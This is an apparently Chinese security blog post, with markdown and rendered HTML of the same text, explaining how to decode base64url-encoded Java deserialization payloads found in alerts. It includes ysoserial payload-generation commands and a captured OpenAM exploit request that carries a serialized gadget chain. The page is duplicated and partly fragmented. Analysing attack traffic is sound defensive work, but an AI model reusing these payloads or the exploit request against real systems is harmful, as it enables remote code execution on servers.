Z2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEE
wACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAAAa1yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk_OR3e8-AQAGPGluaXQ-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
|
|||
|
|
Host: 10.162.147.159:9200
|
|||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Accept: */*
|
|||
|
|
Connection: keep-alive
|
|||
|
|
Content-Type: application/xml
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
扣出其中`jato.pageSession` 参数的值,保存成`target.bin`
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
先处理替换和等号的问题
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
cat target.bin | tr '_-' '/+' > target_lack_equal.bin
|
|||
|
|
./add_equal.sh target_lack_equal.bin > target_base64.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
这里的`add_equal.sh`简单修改一下,支持传入文件名字
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
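#!/bin/bash
# Restore the '=' padding that was stripped from a base64 string.
# Usage: add_equal.sh FILE
# Prints the padded string on stdout. Every diagnostic goes to stderr, because
# stdout is normally redirected into the file that is base64-decoded next.

if [ "$#" -ne 1 ]; then
    echo "Usage: $0 FILE" >&2
    exit 1
fi

filename="$1"

if [ ! -f "$filename" ]; then
    echo "File '$filename' not found." >&2
    exit 1
fi

# Read the whole file; the payload is expected to be a single base64 string.
file_content=$(cat "$filename")

# Drop line breaks (LF and CR) so that only the base64 characters are counted.
base64_string=$(printf '%s' "$file_content" | tr -d '\r\n')

# A padded base64 string always has a length that is a multiple of 4.
length=${#base64_string}
remainder=$((length % 4))

case "$remainder" in
    0) padding_string='' ;;
    2) padding_string='==' ;;
    3) padding_string='=' ;;
    1)
        # No valid base64 string has length % 4 == 1, so the value was most
        # likely cut short (for example by a log or alert field). Pad as
        # before so the intact part can still be decoded, and tell the analyst.
        echo "warning: length $length is not a valid base64 length; input looks truncated" >&2
        padding_string='==='
        ;;
esac

echo "$base64_string$padding_string"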
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
然后处理base64和开头的`00`的问题
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
cat target_base64.bin | base64 -d > target_00.bin
|
|||
|
|
tail -c +2 target_00.bin > restore.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
然后就是用zkar解析一波
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
./zkar dump -f restore.bin > restore.txt
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
将中间反序列化部分扣出来,保存成ser\_hex.txt
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
然后执行下面的脚本保存成class文件:
|
|||
|
|
|
|||
|
|
```python
|
|||
|
|
import re
|
|||
|
|
import sys
|
|||
|
|
|
|||
|
|
def remove_hex_line(input_string):
    """Return input_string with every run of eight hex digits deleted.

    Called on hexdump-style text before the byte values are collected.
    NOTE(review): presumably the eight-digit runs are the offset column of
    the dump -- confirm against the dump format in use.
    """
    return re.sub(r'[0-9a-fA-F]{8}', '', input_string)
|
|||
|
|
|
|||
|
|
def remove_vertical_line(input_string):
    """Delete, on each line, everything from the first '|' through the last '|'.

    Lines with fewer than two '|' characters are returned unchanged.
    """
    bar_delimited = re.compile(r'\|.*\|')
    return bar_delimited.sub('', input_string)
|
|||
|
|
|
|||
|
|
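def extract_hex_to_file(input_filename, output_filename):
    """Rebuild a binary file from a saved hex-dump excerpt.

    The offset column and the |ASCII| column are stripped, the remaining
    two-digit hex bytes are joined, and the result is written as raw bytes.

    The output is attacker-supplied bytecode: open it in a decompiler for
    static reading only, and never load or run it.

    Args:
        input_filename: text file holding the hex-dump lines.
        output_filename: path of the binary file to write.
    """
    with open(input_filename, "r") as file:
        input_text = file.read()

    input_text = remove_hex_line(input_text)
    input_text = remove_vertical_line(input_text)
    # Collect runs of space-separated hex byte pairs, then drop the spaces.
    hex_data = re.findall(r"[0-9a-fA-F]{2}(?: [0-9a-fA-F]{2})*", input_text)
    data = bytes.fromhex("".join(hex_data).replace(" ", ""))

    # A Java class file starts with ca fe ba be. Anything else means the
    # excerpt was cut at the wrong place or picked up stray text, and a
    # decompiler would reject or misread it. Warn, but still write the file.
    if not data.startswith(b"\xca\xfe\xba\xbe"):
        print("Warning: extracted %d bytes that do not start with cafebabe" % len(data),
              file=sys.stderr)

    with open(output_filename, "wb") as file:
        file.write(data)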
|
|||
|
|
|
|||
|
|
if __name__ == "__main__":
    # Expect exactly two arguments: the hex-dump text file and the output path.
    args = sys.argv[1:]
    if len(args) != 2:
        print("Usage: python3 extract_hex.py input_filename output_filename")
        sys.exit(1)

    input_filename, output_filename = args
    extract_hex_to_file(input_filename, output_filename)
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
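python3 extract_hex.py ser_hex.txt restore.class
# Sanity check: a class file begins with "ca fe ba be".
head -c 4 restore.class | od -An -tx1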
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
拿到class,然后丢到idea中,自己反编译了
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
0x05 后言
|
|||
|
|
-------
|
|||
|
|
|
|||
|
|
在分析的时候,发现 ysoserial 两次生成Payload会不一样的。。。卡了我好一会。。。
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
虽然分析没问题,但是步骤略微繁琐,后续有空,可以考虑整合成一个工具,自动解码。
|
|||
|
|
|
|||
|
|
</textarea>
|
|||
|
|
<div id=layer-photos-demo>
|
|||
|
|
<div id=md_view><div class=markdown-body><h2 blockindex=0>0x00 前言</h2>
|
|||
|
|
<p blockindex=1>小伙伴在分析告警的时候,发现反序列化告警,Payload类似<code>AKztAA</code>,不知道咋解,于是有了本文。</p>
|
|||
|
|
<h2 blockindex=2>0x01 文件头</h2>
|
|||
|
|
<p blockindex=3>开始之前,先来复习一些涉及到的一些文件头</p>
|
|||
|
|
<p blockindex=4>以<code>rO0AB</code>开头,java序列化base64编码的数据<br>
|
|||
|
|
以<code>aced</code>开头,java序列化的16进制<br>
|
|||
|
|
以上两个,都可以用 <a href=https://github.com/phith0n/zkar>https://github.com/phith0n/zkar</a> 和<a href=https://github.com/NickstaDB/SerializationDumper>https://github.com/NickstaDB/SerializationDumper</a> 去解析</p>
|
|||
|
|
<p blockindex=5>以<code>cafebabe</code>开头,java class文件的16进制,保存成class,拖到idea中反编译</p>
|
|||
|
|
<p blockindex=6>有了这些文件头信息,下面就可以开始用ysoserial.jar生成Payload了</p>
|
|||
|
|
<h2 blockindex=7>0x02 原始payload</h2>
|
|||
|
|
<p blockindex=8>生成Payload</p>
|
|||
|
|
<pre blockindex=9><code class="hljs language-bash">java -jar ysoserial.jar Click1 <span class=hljs-string>"touch /tmp/xx"</span> > raw_payload.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=10><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=11>查看生成的Payload的十六进制</p>
|
|||
|
|
<pre blockindex=12><code class="hljs language-bash">hexdump -C raw_payload.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=13><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=14>显然,以<code>aced</code>开头,java序列化的16进制,使用<code>zkar</code>解析</p>
|
|||
|
|
<pre blockindex=15><code class="hljs language-bash">./zkar dump -f raw_payload.bin > raw_payload_decode.txt
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=16>然后查看生成的文件,应该可以找到下图:</p>
|
|||
|
|
<p blockindex=17><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=18>以<code>cafebabe</code>开头,java class文件的16进制,保存成class,拖到idea中反编译即可。</p>
|
|||
|
|
<h2 blockindex=19>0x03 编码替换的Payload</h2>
|
|||
|
|
<p blockindex=20>我们在日常分析的时候,java反序列化的漏洞,可能看到的是下面的<code>AKztAAV</code>开头的Payload,对于这类Payload的解码流程,基本上就是先补等号,替换<code>_</code>和<code>-</code>为<code>/</code>和<code>+</code>,然后base64解码,跳过开头的空字符,最后的结果丢给zkar解析就行。如果zkar解析出来有看到<code>ca fe</code>开头的十六进制,就把它提取出来,保存成class文件,最后将class文件丢给idea反编译,即可看到攻击者最终想要执行的命令了。有点乱?没关系,下面我们会一步步分析。</p>
|
|||
|
|
<p blockindex=21><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=22>这种Payload 一般执行如下命令:</p>
|
|||
|
|
<pre blockindex=23><code class="hljs language-bash">java -jar ysoserial.jar Click1 <span class=hljs-string>"touch /tmp/xx"</span> | (<span class=hljs-built_in>echo</span> -ne \\x00 && cat) | base64 | tr <span class=hljs-string>'/+'</span> <span class=hljs-string>'_-'</span> | tr -d <span class=hljs-string>'='</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=24>命令的意思是,使用<code>ysoserial.jar</code>生成一个指定<code>Click1</code>这个gadget 去执行<code>touch /tmp/xx</code>命令的序列化的Payload,然后在该Payload的前面插入一个空字节(<code>\x00</code>),之后对其进行base64编码,编码后的内容,将<code>/</code> 替换为 <code>_</code>,<code>+</code> 替换为 <code>-</code>,最后将<code>=</code>去掉。由于开头多了一个空字节,原始字节以<code>00 ac ed 00 05</code>开头,编码结果也就以<code>AKztAAV</code>开头,而不是常见的<code>rO0AB</code>。</p>
|
|||
|
|
<p blockindex=25>替换<code>/</code>和<code>+</code>是因为 base64 编码的输出可能包含 <code>/</code> 和 <code>+</code> 字符,这些字符在 URL 中有特殊含义,因此需要替换成其他字符以避免问题;替换后的字母表就是 URL 安全的 base64(base64url)。</p>
|
|||
|
|
<p blockindex=26>拆开如下:</p>
|
|||
|
|
<pre blockindex=27><code class="hljs language-bash">java -jar ysoserial.jar Click1 <span class=hljs-string>"touch /tmp/xx"</span> > raw_payload.bin
|
|||
|
|
cat raw_payload.bin | (<span class=hljs-built_in>echo</span> -ne \\x00 && cat) > raw_payload_00.bin
|
|||
|
|
cat raw_payload_00.bin | base64 > raw_payload_00_base64.bin
|
|||
|
|
cat raw_payload_00_base64.bin | tr <span class=hljs-string>'/+'</span> <span class=hljs-string>'_-'</span> | tr -d <span class=hljs-string>'='</span> > raw_payload_00_base64_replace.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=28>因此,我们反着来,即可一步步还原,先处理第四步,替换和等号的问题,等号需要根据字符串长度补充</p>
|
|||
|
|
<pre blockindex=29><code class="hljs language-bash">cat raw_payload_00_base64_replace.bin | tr <span class=hljs-string>'_-'</span> <span class=hljs-string>'/+'</span> > restore_raw_payload_00_base64_replace_lack_equal.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=30>然后执行下面的shell脚本</p>
|
|||
|
|
<pre blockindex=31><code class="hljs language-bash"><span class=hljs-meta>#!/bin/bash</span>
|
|||
|
|
|
|||
|
|
file_content=$(cat restore_raw_payload_00_base64_replace_lack_equal.bin)
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 移除可能存在的换行符</span>
|
|||
|
|
base64_string=$(<span class=hljs-built_in>echo</span> -n <span class=hljs-string>"<span class=hljs-variable>$file_content</span>"</span> | tr -d <span class=hljs-string>'\n'</span>)
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 计算base64编码字符串长度</span>
|
|||
|
|
length=<span class=hljs-variable>${#base64_string}</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 计算需要补充的等号数量</span>
|
|||
|
|
remainder=$((length % <span class=hljs-number>4</span>))
|
|||
|
|
padding=$(((<span class=hljs-number>4</span> - remainder) % <span class=hljs-number>4</span>))
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 补充等号</span>
|
|||
|
|
<span class=hljs-keyword>if</span> ((padding &gt; 0)); <span class=hljs-keyword>then</span>
|
|||
|
|
padding_string=$(<span class=hljs-built_in>printf</span> <span class=hljs-string>'=%.0s'</span> $(seq 1 <span class=hljs-variable>$padding</span>))
|
|||
|
|
base64_string=<span class=hljs-string>"$base64_string<span class=hljs-variable>$padding_string</span>"</span>
|
|||
|
|
<span class=hljs-keyword>fi</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-built_in>echo</span> <span class=hljs-string>"<span class=hljs-variable>$base64_string</span>"</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<pre blockindex=32><code class="hljs language-bash">./add_equal.sh > restore_raw_payload_00_base64_replace.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=33>这时候我们可以比对一下,看看是否还原成功</p>
|
|||
|
|
<p blockindex=34><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=35>接下来开始还原第三步,base64解码即可:</p>
|
|||
|
|
<pre blockindex=36><code class="hljs language-bash">cat restore_raw_payload_00_base64_replace.bin | base64 -d > restore_raw_payload_00.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=37><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=38>然后是第二步,跳过开头的空字节:</p>
|
|||
|
|
<pre blockindex=39><code class="hljs language-bash">tail -c +2 restore_raw_payload_00.bin > restore_raw_payload.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=40><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=41>最后就是拿过去让<code>zkar</code>解析了,这里不再重复了</p>
|
|||
|
|
<h2 blockindex=42>0x04 实战</h2>
|
|||
|
|
<p blockindex=43>拿到攻击者的请求:</p>
|
|||
|
|
<pre blockindex=44><code class="hljs language-bash">GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-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-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAAAa1yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc
2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk_OR3e8-AQAGPGluaXQ-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
|
|||
|
|
Host: 10.162.147.159:9200
|
|||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Accept: */*
|
|||
|
|
Connection: keep-alive
|
|||
|
|
Content-Type: application/xml
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=45>扣出其中<code>jato.pageSession</code> 参数的值,保存成<code>target.bin</code></p>
|
|||
|
|
<p blockindex=46><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=47>先处理替换和等号的问题</p>
|
|||
|
|
<pre blockindex=48><code class="hljs language-bash">cat target.bin | tr <span class=hljs-string>'_-'</span> <span class=hljs-string>'/+'</span> > target_lack_equal.bin
|
|||
|
|
./add_equal.sh target_lack_equal.bin > target_base64.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=49>这里的<code>add_equal.sh</code>简单修改一下,支持传入文件名字</p>
|
|||
|
|
<pre blockindex=50><code class="hljs language-bash"><span class=hljs-meta>#!/bin/bash</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-keyword>if</span> [ <span class=hljs-string>"<span class=hljs-variable>$#</span>"</span> -ne 1 ]; <span class=hljs-keyword>then</span>
|
|||
|
|
<span class=hljs-built_in>echo</span> <span class=hljs-string>"Usage: <span class=hljs-variable>$0</span> "</span>
|
|||
|
|
<span class=hljs-built_in>exit</span> 1
|
|||
|
|
<span class=hljs-keyword>fi</span>
|
|||
|
|
|
|||
|
|
filename=<span class=hljs-string>"<span class=hljs-variable>$1</span>"</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-keyword>if</span> [ ! -f <span class=hljs-string>"<span class=hljs-variable>$filename</span>"</span> ]; <span class=hljs-keyword>then</span>
|
|||
|
|
<span class=hljs-built_in>echo</span> <span class=hljs-string>"File '<span class=hljs-variable>$filename</span>' not found."</span>
|
|||
|
|
<span class=hljs-built_in>exit</span> 1
|
|||
|
|
<span class=hljs-keyword>fi</span>
|
|||
|
|
|
|||
|
|
file_content=$(cat <span class=hljs-string>"<span class=hljs-variable>$filename</span>"</span>) <span class=hljs-comment># 读取文件内容</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 移除可能存在的换行符</span>
|
|||
|
|
base64_string=$(<span class=hljs-built_in>echo</span> -n <span class=hljs-string>"<span class=hljs-variable>$file_content</span>"</span> | tr -d <span class=hljs-string>'\n'</span>)
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 计算base64编码字符串长度</span>
|
|||
|
|
length=<span class=hljs-variable>${#base64_string}</span>
|
|||
|
|
|
|||
|
|
